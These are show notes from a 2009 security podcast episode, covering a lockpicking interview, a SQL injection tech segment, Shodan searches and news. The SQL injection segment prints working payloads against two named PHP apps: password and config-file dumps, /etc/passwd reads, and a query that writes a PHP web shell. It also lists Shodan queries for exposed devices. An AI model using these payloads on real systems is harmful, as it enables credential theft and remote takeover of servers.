Episode180

From Paul's Security Weekly
Revision as of 19:13, 17 December 2009 by Pauldotcom (Talk | contribs)

Jump to: navigation, search
Palo Alto Networks
Tenable Network Security
The SANS Institute
Pwnie Express
Black Hills Information Security
BlackSquirrel
Onapsis

SANS Las Vegas from October 26-27th will debut a new course titled "Embedded Device Security Assessments for the Rest of Us" which will teach students how to assess embedded systems of all varieties on pen tests and in your duties as a security professional. Register Here


Sponsors

  • Tenable Network Security - This episode sponsored by Tenable network security. Tenable is a developer of enterprise vulnerability, compliance and log management software, but most notably the creators of Nessus, the worlds best vulnerability scanner. Tenable Security Center software extends the power of Nessus through reporting, remediation workflow, IDS event correlation and much more. Tenable also offers a Nessus Professional Feed to detect vulnerabilities in your network today! Tenable – Unified Security Monitoring!
  • Core Security - This episode is also sponsored by Core Security Technologies, helping you penetrate your network. Now version 10.0 with WiFi-fu good to go! Rock out with your 'sploit out! Listen to this podcast and qualify to receive a 10% discount on Core Impact, the worlds best penetration testing tool.
  • Trustwave Spiderlabs - Trustwave's SpiderLabs - providing advanced information security services to planet Earth. Visit them online at trustwave.com/spiderlabs!

Shameless Plugs & General Announcements

PaulDotCom Security Weekly - Episode 180 - For Thursday December 17th, 2009

  • International Mac Podcast (IMP) 12 hour extravaganza - This has been recorded, check the Securabit feed. Also, I was joined by Anthony Gartner and George Starcher. We talked about security in general mostly, not so much "here is how you enable the firewall on a Mac".
  • Defensive Intuition - We are also sponsored by Defensive Intuition. Defensive Intuition is the provider of many security consulting services: penetration testing, physical assessments, and social engineering. Defensive Intuition: Owning your boxes, 7 ways to Sunday!
  • QuahogCon Call for Papers - QuahogCon is a Southern New England conference for the hacker culture in all forms, and is looking for presentations!
  • Shmoocon - This will be the next big conference that we will all be attending. We will have t-shirts and other special things to give away and sell. No, we are not selling the interns (who will both be there, btw). So come find us at the booth for all things PaulDotCom including free stickers, and PaulDotCom complete works DVDs!

Interview with Deviant Ollam: Gun Packin', Beer Chillin', Lockpickin' Freedom Junkie

While paying the bills as a network engineer and security consultant, Deviant's first and strongest love has always been teaching. Deviant runs the Lockpicking Village at DEFCON and ShmooCon and is a fanatical supporter of free speech rights who believes that the best way to increase security is to publicly disclose vulnerabilities. His favorite Amendments to the US Constitution are, in no particular order, the 1st, 2nd, 9th, & 10th.

Deviant notes that he makes distinctions between "high security" and "virtually unpickable" locks. Most people can grasp the distinction between locks that are basic, dime-store hardware and some people can even understand how locks can be made somewhat hardened or "pick resistant"... and, in truth, many of these such locks are fine for residential purposes.

But... in the business world, a higher standard of lock is needed, specifically one that can thwart covert entry. Right now, virtually no industry standard of which i am aware focuses on resistance to surreptitious attack. And that's the real, key thing when it comes to protecting super sensitive assets... not just merely keeping people out but knowing, absolutely knowing /for certain/, if anyone gets in.

This is a theme he explores in a talk he's been developing entitled "The Four Types of Lock" where he clearly delineates between...

  • Basic
  • Resistant
  • High Security
  • "Unpickable"

Check out the videos:


Deviant has put together some slides for his appearance, which can be downloaded here.

Questions:

  1. How did you get your start in information security?
  2. What got you so interested in lock picking?
  3. What was the first lock you ever picked?
  4. Have you lock pikcing skills ever come in handy in a tricky situation? Every meet women, save lives, or get arrested?
  5. Do you need specialized training to be able to pick locks?
  6. Are locksmiths just glorified lock pickers? Is there a "black art" associated with the trade?
  7. Given that most locks can be picked quite easily, do I need to change all of the locks on my house?
  8. If I did, what locks would you recomend? What kind of locks do you use at your own house?
  9. Are there any locks that are unpickable?
  10. Has anyone claimed locks to be unpickable and not lived up to their claims?
  11. What about safes, is that similar to lock picking?
  12. Do you carry keys with you, or just a lockpick set and a cape?
  13. What is the bottom line, are we all screwed? Is there so physical security anymore? What do you recommend businesses do to address this problem?
  14. What are the major areas in business that they should be worried about picking and upgrade their locks (network cabinets, electrical, etc...)
  15. In information security we always recommend two-factor authentication, does that apply to door locks?
  16. What are your tips on flash cooling beer safely?
  17. What's the most friendly airline for flying with firearms?
  18. Any thoughts on Super Media Store/Linkyo Corp?

Tech Segment: Adventures with SQL Injection

SQL injection is so much fun! I spent a lot of time this week researching the detection and exploitation of several different SQL injection flaws. More details on using Nessus for detecting SQLi are forthcoming (check the Tenable Blog, http://blog.tenablesecurity.com next week).

Detection

Below are some of the methods I used for detecting SQL and finding vulnerable apps:

  • OSVDB - This is a really awesome site. Sometimes I can't even believe how powerful it is. The developers and project contributors do an excellent job. For example, I was looking for applications that contain easily exploitable SQL injection flaws. Now, I could start doing code review and testing applications myself. However, I'm on the fasttrack here and want to jump right into honing my SQL injection kung fu. So, created a query on OSVDB to find all web applications in the past year, that are remotely exploitable SQLi bugs, have an entry in the exploit database, and are easy to exploit. The query ends up looking like this:

http://osvdb.org/search/search?search[vuln_title]=SQL+injection&search[text_type]=titles&search[s_date]=January+1%2C+2009&search[e_date]=December+17%2C+2009&search[refid]=&search[referencetypes]=EXPLOITDB&search[vendors]=&search[cvss_score_from]=&search[cvss_score_to]=&search[cvss_av]=N&search[cvss_ac]=L&search[cvss_a]=*&search[cvss_ci]=*&search[cvss_ii]=*&search[cvss_ai]=*&kthx=search

And we get 357 results. Totally awesome! Let me tell you, if there ever was a heaping, stinking, pile of crap PHP code, it exists in the search results from this query.

  • Nikto - Nikto was not so helpful. However, I do find that Nikto has some coverage of vulnerabilities and will do an okay job of finding directories. Its weird, Nikto will still manage to find stuff that some other tools just plain miss, and interesting stuff too! For example, if you are looking to upload a file or read remote files, having some info about additional directories is a really good thing. Which is another point I wanted to make, automated tools are useful and you are not lame for using them. This is a prime example. if ou are testing a web site, you will want to brute force the directory stucture. Doing it manually could suck and may not give you all of the results.
  • curl - Yes, curl. Its such as awesome tool. For example, if your scanner or OSVDB search comes back and says that a particular vulnerability is only accessible in a POST request, what do you do? Sure, you could fire up a proxy and do it that way. But, I love the command line, as many of you know. Therefore, I really like using curl like this:
$ curl http://192.168.1.1/index.php --data @postdata -A "evil browser 1.0"

The "--data" tells curl to send the data in the file called "postdata" to the web application. You can also use "--data-binary" to find other interesting flaws, and send things like NULL bytes. The -A is the user-agent string. Curl can also be used to send cookies as well.

Exploitation

Penetrating the application is where the fun really begins (yes, I just said that). Fortunately for us it likes it. Some applications more than others. A great example is this little "Image Voting" app, and another one called "phpbms". Go seek them out. I don't want to pick on the developers, but the code is bad, like really bad. In any case, below are some example exploitation strings:

XSS

I will start with the simple XSS, as they kinda relate to the SQL injection:

/Image_voting/index.php?show=-7UNION%20SELECT%201,%3Cscript%3Ealert(%22XSS%22);%3C/script%3E

Not so useful in this application, but neat none the less. Some of the SQL parameters end up in the HTML and allowed me to put the <script> tag in it. Input sanitization, its key, use it.

SQLi

/phpbms/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--

Neat SQLi code to dump the users and passwords. HOT.

/Image_voting/index.php?show=-7%20union%20select%201,concat_ws(0x3a,load_file(%22/etc/passwd%22)),3,4,5--

Dumping the password file. You can use a variation on this one to dump the config of Image Voting, including the database username and password:

/Image_voting/index.php?show=-7%20union%20select%201,concat_ws(0x3a,load_file(%22/var/www/Image_voting/config.php%22)),3,4,5--

The output gets lost on the rendered page, but do a view source to see the results it their entirety.

/Image_voting/index.php?comment_name=&id=6&vote=10&comment_text=&show=3%20AND%20SLEEP(12)=0

Timing based attack and blind SQLi found by Nessus. This one may be a 0Day, but really who cares and really who is using this application anyhow? Its neat, when you go to this URL, the page actually waits 12 seconds.

And, of course, the best SQLi I saved for last:

/phpbms/modules/bms/invoices_discount_ajax.php?id=-1%20UNION%20SELECT%20%22%3C?%20system($_REQUEST['cmd']);%20?%3E%22%20INTO%20OUTFILE%20%22/var/data/mt-blogs/images/cmd.php%22%20

Yes, building a PHP file on the fly which allows for execution of OS commands. We've done this before, but that was when we used phpMyAdmin, which has a box to enter a SQL command. This is done in a live application, which is neat. Also, the images folder is writable so that the application can save images to the server when user's upload them.

Final Thoughts

I learned a lot by finding these vulnerable applications and exploiting them. The nice part is that you can see the source code, as they are open source, and really try to figure out whats going on. It took some time to come up with the right syntax to get things working. So, first off, I hope you can use my examples here to pwn stuff (with permission of course). Second, I hope you do this on your own as well. Not only is is great fun, but it helps sharpen your skills. There were a lot of "aha!" moments where just slight changes to the columns returned or syntax would make things work. Hopefully I can apply this knowledge when testing apps that are not on my test network (and not in .cn).


Mini Tech Segment: SHODAN. Like a kid in a candy store.

We've talked about Shodan in a previous show, but lets talk about some goodies.

  • What is SHODAN? *

In a nutshell:

  1. Pick some common ports such as 80, 23, 21
  2. Do a connect scan on several machines across the internet
  3. Record the banners that come back
  4. Index and make the full banner searchable

That’s SHODAN!

It is a google for services!

We are limited to a data set that is static from the once in time scan, unless the data set is updated by the author, and has a limited number of ports. Of course make some suggestions!

With the search results, we have not made a connection to the host, just SHODAN. The SHODAN authors have gone and hit all that stuff for you already. They'll never see us coming...

Interesting search directives

  • Two letter country code
  • Port number
  • Domain name
  • CIDR mask - this is currently disabled so that it cannot be used for evil. However, with a little bit of DNS reckon outside of SHODAN, you can probably do an audit it an IP range...

Interesting combinations for "evil"

Lets talk about some use cases. Some are mine, some are some stuff that I have seen….

  • Unsecured HP JetDirects: Password is not set port:23
  • IIS 5 in China: iis 5.0 country:CN hostname:.cn
  • ProFTPD in Brazil: ProFTPD country:BR
  • Vulnerable Apache: apache 2.2.3
  • Already logged in?: login port:21
  • Mmm, telnet: telnet port:21
  • Pwned! (expand this one to look for com_* objects): joomla
  • IP Surveillance DVR: Server: SQ-WEBCAM
  • AS/400 web servers in China? : IBM-HTTP-Server Country:CN
  • AS/400 Terminal sessions? COPYRIGHT IBM CORP. or Subsystem

Please, go audit your own stuff!

Stories For Discussion

  1. Conficker "I am not dead yet!! - [ strandjs ] - What the hell? 7 million systems as recent as October 2009? It just goes to show how powerful a little bit of obfuscation can be.
  2. The Adobe Record Player is Broken - [ strandjs ] - Adobe tells us it is going to be a bit longer before they get around to patching the latest 0 day. Hey, it makes my job easier.
  3. How botnets are getting more resilient to removal - [ strandjs ] - A nice write-up on how the attackers are going about persistence on systems…. I might have a few words on how this effects the penetration testing community.
  4. [1] - [strandjs] - nice little code analysis tool from M$. I like how it plugs into the IDE so developers are a bit less likey to shoot themselves in the foot.
  5. How secure is Googles DNS server? - [strandjs] - It is never wrong to question our Google overlords…. Is it? If they did get hacked, would anyone know?
  6. Decaf anyone - [Darren] - Defense system for M$ Coffee detects USB with coffee being installed and defend data on your system from being scraped up. No source so this could in its self be Malware.
  7. I'll have a Decaf, thanks. - [Larry] - This was what Microsoft was worried about. COFEE being leaked so that nefarious individuals could create techniques for subverting the tool. Uhh, welcome to the real world Microsoft.
  8. Social Networks, a Hacker's dream? - [Larry] - Yes! Where do you thin k that we get all the best information for conducting client side attacks. Even some of the less known social networks such as YouTube, Vimeo and Flickr. Consider a Social media policy for employees, but be respective of their rights and personal freedoms. Let's discuss said policy.
  9. Stop posting TSA document…or I'll say stop again! - [Larry] Lawmakers are looking to stop the posting of the poorly redacted TSA document. When will they ever learn?
  10. Hey, that video looks familiar! - [Larry] - Whiskey Tango Foxtrot! You say no cyber war? I dunno. What I do know is that the video from predator (and even the new raptor) drones can be intercepted because the video is unencrypted. Allegedly it can be viewed with $26 worth of software called SkyGrabber and what would be considered commodity hardware in some part of the world. Of course, 20 year old (and new) technology is hard to upgrade/retrofit, but I think that it isn't the drone them selves that fell victim here. The comments were great, from "The U.S. government has known about the flaw since the U.S. campaign in Bosnia in the 1990s, current and former officials said. But the Pentagon assumed local adversaries wouldn't know how to exploit it, the officials said." to "Additional concerns remain about the vulnerability of the communications signals to electronic jamming, though there's no evidence that has occurred, said people familiar with reports on the matter."
  11. PDF analysis - [Larry] - a great little blurb on a process and some tools for quickly analyzing PDF documents for their malicious components, such as JavaScript. Be aware, that the latest Adobe issue wont be fixed for a month and requires Javascript. There was some discussion on the SANS mailing list today that disabling JavaScript in Adobe products via the GPO and registry still asks the user to re-enable javascript on a document by document basis. Of course, what do users click on…
  12. RockYou SQLi - [PaulDotCOm] - A developer site was pwned, and contained over 32 million passwords. From what I understand, the RockYou site was used to develop widgets for Facebook and Myspace. Yikes!
  13. SIDE NOTE - Can we talk about the Facebook Privacy story again, I heard all kinds of data and images were made public. Here is an interesting note
  14. 2010 Security Predictions: Ridiculous stuff already! - [PaulDotCom] - I love predictions, primarily because you can say whatever the hell you want without backing it up in any way, shape, or form (kind of like we do every week here at PDC). Lets have some fun with this one.
  15. Adobe LOVES 0day - [PaulDotCom] - Someone call Adobe and tell them that their code sucks and then proceed to tell them how to fix their developers. In fact, someone from Microsoft should call them and tell them how Microsoft did it, because MS does a better job than Adobe with probably a 50x larger code base.
  16. Fake Steve Jobs Chats With AT&T - A wake up call - [PaulDotCom] - I'm going to be perfectly honest with you, we purposely don't talk politics here on PaulDotCom. To be quite honest, I'm not entirely sure why. Maybe we didn't want to piss people off. Maybe we think we will leave the politics to CNN and Fox news to fight it out. Maybe we were younger when we started this whole things and didn't care about politics as much, and now that we are older we feel the need to complain about the government. Ah, wait, I think I got it, maybe things were never FUCKED UP enough for us to make it an issue. Guess what, I'm making it an issue, because things are bad and people have their heads so far up their asses they are winning yoga awards. So, okay, lets get to the point. AT&T, and its crap-ass network and all its wisdom, has decided to complain that iPhone users are eating bandwidth and leaning towards tell people to use less bandwidth and one can infer, stop buying smart phones. The fake steve jobs article is a fictitious conversation between steve jobs and Randall Stephenson fs AT&T. After some comedy, Fake steve jobs lays down the law. Basically Apple has handed AT&T the greatest smart phone ever produced, and arguably the most awesome piece of technology to be in the hands on consumers in over 20 years, maybe ever. So when more people want to use it, the network goes deeper in the crapper. He related the situation to the beetles, and when their album became popular, they didn't find ways to slow things down, they bought manufacturing plants to make more records. Then the fake Randall says something that I've heard over and over again, "We crunched the numbers, and its in our own best interest to keep going at a crappy pace, on a crappy network". What happened to wanting to be the best, regardless of the numbers? This is the problem say fake steve jobs as he writes:

"what the fuck has gone wrong with our country? Used to be, we were innovators. We were leaders. We were builders. We were engineers. We were the best and brightest. We were the kind of guys who, if they were running the biggest mobile network in the U.S., would say it¿s not enough to be the biggest, we also want to be the best, and once they got to be the best, they¿d say, How can we get even better? What can we do to be the best in the whole fucking world? What can we do that would blow people¿s fucking minds? They wouldn¿t have sat around wondering about ways to fuck over people who loved their product. But then something happened. Guys like you took over the phone company and all you cared about was milking profit and paying off assholes in Congress to fuck over anyone who came along with a better idea, because even though it might be great for consumers it would mean you and your lazy pals would have to get off your asses and start working again in order to keep up. And not just you. Look at Big Three automakers. Same deal. Lazy, fat, slow, stupid, from the top to the bottom ¿ everyone focused on just getting what they can in the short run and who cares what kind of piece of shit product we¿re putting out. "

Does that sound familiar when you are trying to sell a security program at your organization? Is should, it does for me. We seem to have lost sight of wanting to be innovators, doing what's right, and being the BEST. I too love this country deeply, but if we all don't get our head out of our asses we'll stink like shit forever. Because guess what, the security problem seems to wreek of the same stench that our financial and automotive industries do, lazy and all about the bottom line.

Other Stories Of Interest